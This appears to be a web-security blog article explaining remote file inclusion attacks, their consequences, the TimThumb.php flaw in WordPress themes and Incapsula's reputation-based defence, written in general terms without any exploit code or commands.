What is an RFI attack?
As the name indicates, a remote file inclusion attack abuses user-input and file-validation vulnerabilities in order to upload a malicious payload, typically from a remote location. Usually, the capability of the attacker to carry this out relies on in-proper input validation on the victim server. The potential implications of an RFI attack are many and varied (we’ll look at them in more depth further down the page).
RFI attacks are common
Whilst they’re not necessarily as notorious as network layer attacks (in the public eye, at least), RFI attacks are very common. Indeed, they represent 25% of all modern net-based assaults. What makes them so popular amongst those looking to attack a site? Two reasons: firstly, they have a high level of automation, and secondly they have a high damage potential. Essentially, they offer the attacker the opportunity to create the maximum amount of chaos with minimum effort.
How devastating can an RFI attack be?
At its worst, an RFI attack can be incredibly damaging, and can lead to the following problems.
The website being taken over. The attacker will actually be able to obtain complete control of the website, and will be able to delete, deface and modify it according to their wishes.
The server being accessed. Perhaps even more serious than the website takeover, the attacker may be able to access the server itself, meaning that all of the websites using it could be compromised. There is also the potential for the server to be used for other DDoS attacks.
Data theft. Anyone who has access to a website will be able to access high-level data such as financial information, names and addresses and purchase histories. All of these can be used to aid financial theft.
One of the most common recent examples of an RFI attack was perpetrated using the TimThumb.php file found in many websites, particularly those that operate the WordPress CMS system.
The TimThumb.php file isn’t, in itself, dangerous. It’s actually a utility that’s used to help re-size the images on a website, and many WordPress themes have it as part of their structure. The trouble with the utility is that it’s inherently insecure: it relies on the ability to write files into a directory that people visiting the website can access. Because the utility only does a partial match on hostnames, hackers are able to upload and executive arbitrary PHP code in the TimThumb cache directory.
Combating Zero Day Attacks
Many RFI attacks take the form of ‘zero day’ assaults, i.e. they will take place as soon as the weakness is discovered. It’s therefore important to try and mitigate potential avenues for assault in advance. Incapsula, a website security firm, recently introduced reputation based protection is focused on in-depth research regarding RFI attacks.
Company research showed that even when dealing with different attack vendors, the same RFI links were being re-used repeatedly for different targets. This meant that combined with Incapsula’s crowdsourcing technology, a large library of these locations could be documented and form part of an effective early warning system.
Needless to say, RFIs represent a very serious threat to any modern website or server. It is the responsibility of any website administrator to obtain mitigation services strong enough to deal with attacks in this form. Not doing so could be a decision that ends up costing thousands of dollars.